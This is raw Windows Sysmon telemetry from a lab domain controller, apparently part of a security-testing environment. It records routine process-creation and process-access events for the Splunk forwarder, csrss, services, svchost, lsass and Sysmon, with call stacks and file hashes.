Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.126{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.124{59A5CD1D-8E58-6005-3B00-00000000A301}3696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.095{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3A00-00000000A301}3664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.095{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E57-6005-3800-00000000A301}35283548C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.080{59A5CD1D-8E57-6005-3700-00000000A301}35203524C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.079{59A5CD1D-8E58-6005-3900-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.017{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 